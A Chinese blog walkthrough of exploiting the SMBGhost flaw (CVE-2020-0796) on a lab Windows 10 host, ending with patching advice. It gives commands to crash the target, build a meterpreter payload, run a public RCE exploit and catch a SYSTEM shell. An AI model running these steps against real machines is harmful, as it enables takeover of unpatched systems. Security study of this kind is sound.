CVE-2020-0796

本文详细介绍了CVE-2020-0796(永恒之黑)漏洞,该漏洞影响Windows 10 1903及后续版本,但不包括Windows 7。通过SMB3.1.1协议的压缩消息处理缺陷,攻击者可远程执行任意代码。文章提供了漏洞扫描、蓝屏PoC利用、远程攻击的步骤,以及修复建议,包括安装微软发布的补丁或禁用SMBv3压缩。此外,还分析了攻击失败的可能原因。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2020-0796(永恒之黑)

一.对应出现的版本

永恒之黑的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。
原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。
首先下载 CVE-2020-0796扫描检测工具,对网段进行批量扫描。
(下载链接:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

在这里插入图片描述
发现搭建靶机的IP:192.168.31.117存在漏洞风险。

二、开启蓝屏模式

Kali-linux下载蓝屏poc
1.下载CVE-2020-0796-PoC文件夹
git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git

在这里插入图片描述
2. 进入到CVE-2020-0796-PoC目录下,启动setup.py文件下载,这里类似于安装动态文件

cd CVE-2020-0796-PoC
python3 setup.py install

在这里插入图片描述
安装完成

在这里插入图片描述
3. 利用poc对之前扫描出来的192.168.31.117进行攻击

python3 CVE-2020-0796.py 192.168.31.117

在这里插入图片描述
成功打成蓝屏

三、远程利用此漏洞

1.使用msf生成payload.

 msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o 1234.py

在这里插入图片描述
2.下载运程利用的poc

git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

在这里插入图片描述
4. 将1234.py生成的code,替换到exploit.py的USER_PAYLOAD参数,并把参数buf改为USER_PAYLOAD。为了方便使用,我直接在桌面上新建两个文本文档,将其替换,当然,这里的替换方法不唯一。
explore.py中的内容放到文本1中

在这里插入图片描述
1234.py中的内容放到文本2中

在这里插入图片描述
将文本2中的buf进行替换为USER_PAYLOAD

在这里插入图片描述

最后统一复制到explore.py中

在这里插入图片描述
替换完成之后,运行explore.py

python3 exploit.py -ip 192.168.31.117 

在这里插入图片描述

使用msf来监听本地端口

 use exploit/multi/handler

使用 exploit/multi/handler模块
设置payload路径

set payload windows/x64/meterpreter/bind_tcp

设置本地端口

set lport 1234

查看还有那些需要设置的量

show options

在这里插入图片描述
缺少攻击的IP,设置攻击的IP

set RHOST 192.168.31.117

设置好参数之后,开始攻击exploit

在这里插入图片描述
直接获得system权限

在这里插入图片描述

四、漏洞修复建议

1. 如果您的操作系统是上述版本,请在根据如下链接下载修复补丁进行修护
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

2.若无法安装更新的用户可以选择遵循微软官方指南,停用SMBv3的压缩功能。

3.应及时进行Microsoft Windows版本更新并且保持Windows自动更新开启。
windows server / windows 检测并开启Windows自动更新流程如下
• 点击开始菜单,在弹出的菜单中选择“控制面板”进行下一步。
• 点击控制面板页面中的“系统和安全”,进入设置。
• 在弹出的新的界面中选择“windows update”中的“启用或禁用自动更新”。
• 然后进入设置窗口,展开下拉菜单项,选择其中的自动安装更新(推荐)。

五、参考链接

https://www.jianshu.com/p/cad64e889f53

六、打不通的原因分析

1.该漏洞的补丁已打;
2.防火墙和安全工具没关;
3.注意路径和对应的端口;
4.在复制转换的过程中,重复或标点符号出问题等

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值